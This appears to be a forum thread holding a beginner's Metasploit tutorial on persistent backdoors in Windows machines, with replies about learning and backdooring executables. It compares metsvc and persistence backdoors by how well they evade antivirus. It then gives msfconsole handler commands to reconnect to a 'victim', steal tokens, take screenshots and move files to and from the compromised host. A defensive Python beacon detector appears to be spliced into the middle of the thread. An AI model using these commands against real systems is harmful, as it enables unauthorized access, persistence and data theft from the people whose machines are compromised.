
METSVC:
VERY BAD: All 3 files in use get flagged by Norton Internet Security 2011 as a trojan; other AVs will probably do this too!
BAD: If the IP changes you have to know the new IP to connect back to the victim
GOOD: Easy to use
GOOD: It doesn't request YOUR IP and port!

PERSISTENCE:
BAD: It requests YOUR IP and port!
BAD: Can be more "difficult" to use
GOOD: Flexible
GOOD: Auto connect
ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! It is only when you run NPE (Norton Power Eraser) that it is detected as bad and removed, and that's a tool you must download!

-------------------------------------

{GET BACK INTO SYSTEM} (using metsvc in a new terminal)

Code:

cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
# Must be this port, as far as I know
set LPORT 31337
set RHOST [VICTIM IP ADDRESS]
# See if your setup is correct
show options
exploit

------------------------------------

{GET BACK INTO SYSTEM} (using persistence in a new terminal)

Code:

cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [INTERNAL IP ADDRESS]
# The port set in the persistence backdoor
set LPORT [PORT]
show options
exploit

----------
# Now we wait for the connection; it will reconnect to your computer within 300 sec
----------

# If the result is "NT AUTHORITY\SYSTEM" do the following, else go to "use priv":
getuid

# Find the PID of explorer.exe
ps

# From what I know this grants you the same rights as the user running that process
steal_token [PID of explorer.exe]

# Use "ls", "pwd" and "cd" to navigate around - see below under commands

Explanation:
Create a txt file on your BT4 desktop and write anything in it, or nothing, and save it with the name "test.txt". Then, in the meterpreter console in a terminal (after you're connected to the victim), navigate to the desktop of the user currently logged in.
Use "pwd" without quotes to check that the path is correct; if it is, type the following:

{Upload}

Code:

upload /root/test.txt test.txt
# And if you are uploading a file with a space in its name:
upload "/root/test 2.txt" "test 2.txt"

# Or if you're not in the path where you want to upload the file, and want it uploaded to another folder

Explanation:
Now we are going to download the file we just uploaded, "test.txt". Navigate to the folder if you're not already in it, using the "cd", "pwd" and "ls" commands.

Then type:

Code:

download test.txt /root/test.txt
# And if you are downloading a file with a space in its name
download "test 2.txt" "/root/test 2.txt"
# Or if you're not in the path where the file is, but know its exact path and name (found with search)
download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
# Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"

------------------------------------
{Commands} (meterpreter console)

help # USE THIS!!! That's mostly how I got this knowledge, and then I googled the commands to get more info on them

screenshot # No need to say what it does - remember you must have used "use priv" in meterpreter first

First i will say, USE THIS AT YOUR OWN RISK! Do not blame me for anything. DO NOT misuse this information, only use this in a test setup!

And I will point out for other beginners: I started using Metasploit 2 days ago, so do yourself a favour and put some heart into it. Do your legwork before asking; I just gave you a complete detailed guide from start to finish, on a silver platter.

As always, if you have any questions, google it first and then google it some more, and THEN ask for directions, not the solution!
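Both callback styles described in the guide leave a footprint a defender can look for: metsvc listens on TCP 31337, and the persistence backdoor retries the reverse connection on a fixed timer (the thread says within 300 sec). The following Python is an added example (not code from the thread or from Metasploit) that flags both patterns in constructed firewall-style log lines; the log format, hosts and the 4444 callback port are assumptions.

```python
"""Flag a listener on the metsvc bind port and fixed-interval outbound
reconnects, on constructed connection-log lines (added example)."""
from collections import defaultdict
from datetime import datetime

# Constructed sample log: "timestamp direction src_ip:src_port dst_ip:dst_port"
LOG = """\
2011-03-01T10:00:00 OUT 10.0.0.5:49152 203.0.113.7:4444
2011-03-01T10:05:01 OUT 10.0.0.5:49160 203.0.113.7:4444
2011-03-01T10:10:02 OUT 10.0.0.5:49171 203.0.113.7:4444
2011-03-01T10:15:00 OUT 10.0.0.5:49180 203.0.113.7:4444
2011-03-01T10:03:17 OUT 10.0.0.5:49155 192.0.2.20:443
2011-03-01T10:07:40 OUT 10.0.0.5:49158 192.0.2.20:443
2011-03-01T10:02:00 LISTEN 10.0.0.5:31337 0.0.0.0:0
2011-03-01T10:02:00 LISTEN 10.0.0.5:445 0.0.0.0:0
"""

METSVC_PORT = 31337        # metsvc_bind_tcp port named in the thread
PERSIST_INTERVAL = 300     # seconds, per the thread's "within 300 sec"
TOLERANCE = 15             # allowed jitter around the interval

def parse(log):
    """Turn each log line into (datetime, direction, src, dst)."""
    events = []
    for line in log.splitlines():
        ts, direction, src, dst = line.split()
        events.append((datetime.fromisoformat(ts), direction, src, dst))
    return events

def unexpected_listeners(events, port=METSVC_PORT):
    """Hosts with a socket listening on the metsvc bind port."""
    return sorted({src.split(":")[0] for _, d, src, _ in events
                   if d == "LISTEN" and src.endswith(f":{port}")})

def periodic_callbacks(events, interval=PERSIST_INTERVAL, tol=TOLERANCE, min_hits=3):
    """(src_host, dst) pairs whose outbound connections recur every ~interval s."""
    by_pair = defaultdict(list)
    for ts, d, src, dst in events:
        if d == "OUT":
            by_pair[(src.split(":")[0], dst)].append(ts)
    flagged = []
    for pair, times in by_pair.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        regular = [g for g in gaps if abs(g - interval) <= tol]
        if len(regular) + 1 >= min_hits:   # at least min_hits evenly spaced hits
            flagged.append(pair)
    return sorted(flagged)
```

The 443 connections are ignored because their spacing is irregular, while the beacon to port 4444 is flagged from the timing alone, without looking at the payload.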

Quote: I started using Metasploit 2 days ago, so do yourself a favour and put some heart into it. Do your legwork before asking; I just gave you a complete detailed guide from start to finish, on a silver platter.

Well, most beginners ask because they just want the info so that they can misuse it to do harm, without a better understanding of what it is they are doing, whereas only a few ask because they really want to learn something from it.

I know this guide can and will be misused by some people, and I'm fine with that; I just hope they get caught. I don't have respect for people who want to break into others' systems without their permission; I really can't see the point in it :/

I'm learning this so that I know a little more about how I can be attacked, and I use this info so that I can maybe close some holes in my setup at home. And it's also quite fun.

I've found that getting into the security end has really forced me to get deeper into the protocols and such that I've already been working with as a networker.

Also, though perhaps indirectly, pentesting and the security 'arts' eventually (not always...) force developers round the world to improve their code. And everybody likes better software.

I appreciated the section you did on backdooring. You may want to include the backdooring-an-exe capability. If you're not sure how to with Metasploit, check out the Metasploit Unleashed section on extended MSF usage, Chapter 12 section 2. Great feature, although the MSF Unleashed page only goes into the beginning detail of it, probably due to all of our favourite mantra (try harder!)

Yes indeed a great tut; I have yet to try it. Like all tuts I have been through, there are always issues to get around, and that is the fun of it. No attack is completely linear to the others, and in turn it forces you to learn outside the given realm.

I am not a security professional, more so an enthusiast. It is tuts like these that not only educate people like me, but allow me to apply said education and offer the information to others who do not have the time or knowledge.

I have had numerous friends have their data limits completely thrashed by intruders, which causes them to spend more money. I have had mine and other friends' banking information sniffed out (by neighbours who had a little run-in with the law post-hack) and in turn have used what little information I have to amateurishly secure their networks and routers.

And to think 2 months ago I was completely ignorant of BackTrack, and now after two months of passive learning, I can say that I have the basic knowledge and ability to secure minor residential networks for friends and family, and I have these forums to thank, and the posters I am indebted to. No one will be stealing my gigabytes and money anymore!

Thanks for the tuts, the help, the information and the overall professional attitude reflected by a majority of users on this site. Thanks again.


I've had a lot of fun messing around with backdooring a few of the most used Windows exes.

I can see you've done your reading, however. Great tut! Especially after the editing you've done.

About backdooring an exe: I already have that in "Create the exploit", the first code box in the guide. I use encode there and I also explain a LITTLE bit about the error you can get. I didn't go directly into details, but if that's what you guys want I can do that too. By the way, have any of you got the "-k" option to work yet, so that the exe you're backdooring still works? If yes, please post an example code.

And again, I'm a beginner, so please correct me if I have understood anything wrong or explained anything in the wrong way!

You said that this tutorial is for beginners, yet you've omitted many details that a layman needs to understand it.
The format is very tiring to read.

Quote: And I will point out for other beginners: I started using Metasploit 2 days ago, so do yourself a favour and put some heart into it. Do your legwork before asking; I just gave you a complete detailed guide from start to finish, on a silver platter.

For two days, until you learn something fast; now spend about 40 days more and learn more about text formatting too!